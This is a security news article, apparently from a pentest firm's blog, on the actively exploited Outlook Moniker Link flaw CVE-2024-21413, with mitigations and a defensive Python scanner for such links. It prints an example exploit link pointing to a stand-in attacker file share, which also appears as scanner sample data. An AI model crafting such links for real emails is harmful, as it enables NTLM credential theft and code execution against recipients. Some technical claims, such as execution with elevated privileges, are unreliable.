Critical RCE Bug in Microsoft Outlook Now Exploited in Attacks

A critical remote code execution (RCE) vulnerability in Microsoft Outlook is now being actively exploited in the wild, prompting urgent warnings from cybersecurity authorities, including the U.S. Cybersecurity and Infrastructure Security Agency (CISA).
A Looming Threat to Organizations
CISA has directed U.S. federal agencies to secure their systems against ongoing cyberattacks targeting this vulnerability, tracked as CVE-2024-21413. The flaw was originally discovered by Check Point vulnerability researcher Haifei Li and is a result of improper input validation when processing emails containing malicious links.
The exploit allows attackers to bypass Protected View, a security feature meant to prevent potentially harmful Office documents from executing malicious code. By circumventing this safeguard, attackers can launch their payloads without requiring any user interaction beyond simply previewing an email.
How the Exploit Works
Microsoft patched CVE-2024-21413 a year ago, warning that the Preview Pane itself could serve as an attack vector. This means that even opening a malicious email in Outlook could trigger the exploit, making it particularly dangerous.
According to Check Point, attackers exploit the vulnerability using Moniker Links, a technique that tricks Outlook into opening unsafe files. The exploit leverages the file:// protocol, allowing attackers to embed malicious links that bypass Outlook’s built-in security protections.
By appending an exclamation mark followed by arbitrary text to a file URL, attackers can force Outlook to treat the malicious file as a trusted resource. For example, an attacker might craft a link like this:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
When a victim clicks on the link, Outlook fetches the file from an attacker-controlled server and executes it with elevated privileges.
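As an added defensive example (not code from the article, Check Point or Microsoft), the following Python scans an HTML mail body for file: links and flags the exclamation-mark Moniker Link shape described above, reporting the UNC host so it can be blocked or hunted for. The functions scan_html_body and classify_href and the sample message are constructed for this illustration; 192.0.2.10 is a documentation-range address, not a real indicator.

```python
import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import unquote

# Any file: scheme is suspicious in mail; the "!" suffix is the Moniker Link
# marker the article describes as the Protected View bypass trigger.
_FILE_RE = re.compile(r"^\s*file:(?P<path>.*)$", re.IGNORECASE)
_UNC_HOST_RE = re.compile(r"^[\\/]*(?P<host>[^\\/]+)(?:[\\/]|$)")


def classify_href(href: str) -> Optional[dict]:
    """Return a finding for a file: href, or None for any other scheme."""
    href = unquote(href.strip())  # undo %21-style encoding of "!"
    m = _FILE_RE.match(href)
    if not m:
        return None
    path = m.group("path")
    body = path.lstrip("/")  # drop the file:/// slashes
    # UNC as file:///\\host\share (the article's form) or file://host/share
    is_unc = body.startswith("\\\\") or (
        path.startswith("//") and not path.startswith("///"))
    hm = _UNC_HOST_RE.match(body) if is_unc else None
    bang = "!" in body
    # UNC + "!" is the exploit shape; a bare UNC link still leaks NTLM auth.
    severity = "critical" if is_unc and bang else "high" if is_unc else "medium"
    return {"href": href, "unc_host": hm.group("host") if hm else None,
            "moniker_bang": bang, "severity": severity}


class _HrefCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.hrefs: list = []

    def handle_starttag(self, tag, attrs) -> None:
        for name, value in attrs:  # values arrive already HTML-unescaped
            if name.lower() == "href" and value:
                self.hrefs.append(value)


def scan_html_body(html: str) -> list:
    """Return a finding for every file: link in an HTML mail body."""
    parser = _HrefCollector()
    parser.feed(html)
    parser.close()
    return [f for f in map(classify_href, parser.hrefs) if f]


# Constructed sample: a benign link, the article's example link, and a
# percent-encoded variant of the same pattern against a documentation IP.
SAMPLE_BODY = """<html><body>
<a href="https://example.com/invoice">Invoice</a>
<a href="file:///\\\\10.10.111.111\\test\\test.rtf!something">CLICK ME</a>
<a href="FILE:///\\\\192.0.2.10\\share\\doc.rtf%21x">Report</a>
</body></html>"""
```

Running scan_html_body(SAMPLE_BODY) yields two critical findings with hosts 10.10.111.111 and 192.0.2.10 and ignores the HTTPS link.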
Affected Microsoft Products
The vulnerability affects multiple Microsoft Office products, including:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019
Successful exploitation can lead to:
- Theft of NTLM credentials
- Remote code execution
- Potential full system compromise
Active Exploitation and Urgent Mitigation Steps
On February 6, 2025, CISA added CVE-2024-21413 to its Known Exploited Vulnerabilities (KEV) catalog, marking it as an actively exploited vulnerability. In compliance with Binding Operational Directive (BOD) 22-01, federal agencies have been given a three-week deadline — until February 27 — to patch their systems and mitigate the risk.
CISA emphasized the urgency of the situation, warning that such vulnerabilities are a frequent attack vector for nation-state actors and cybercriminal groups, posing a significant risk to government and private-sector organizations alike.
What Should Organizations Do?
While the mandate primarily applies to federal agencies, private businesses are strongly advised to prioritize patching to prevent compromise. Organizations should take the following immediate actions:
Apply Microsoft’s Security Patch — Ensure all Microsoft Office products are updated to the latest version.
Disable NTLM Authentication Where Possible — Reducing reliance on NTLM authentication can help mitigate credential theft.
Monitor Network Traffic for Anomalies — Keep an eye out for unusual outbound connections to unknown file shares.
Educate Employees — Train staff on the dangers of clicking unknown links or opening unexpected attachments.
Enable Advanced Threat Protection (ATP) — Microsoft Defender and other security solutions can provide an extra layer of protection.
A Wake-Up Call for Cybersecurity
This attack highlights the ongoing cat-and-mouse game between cyber defenders and malicious actors. Even after a vulnerability has been patched, the risk of exploitation remains high if organizations fail to apply updates promptly. The fact that attackers can leverage something as seemingly harmless as a preview pane in Outlook underscores the need for a proactive cybersecurity strategy.
With federal agencies now rushing to comply with CISA’s directive, organizations worldwide should follow suit and secure their networks before attackers can strike. The urgency of this threat cannot be overstated: delayed action could mean the difference between a secure system and a devastating breach.
For organizations still using unpatched versions of Outlook and Microsoft Office, the time to act is now.
About the Creator
WIRE TOR - Ethical Hacking Services
WIRE TOR is a Cyber Intelligence Company that Provides Pentest & Cybersecurity News About IT, Web, Mobile (iOS, Android), API, Cloud, IoT, Network, Application, System, Red teaming, Social Engineering, Wireless, And Source Code.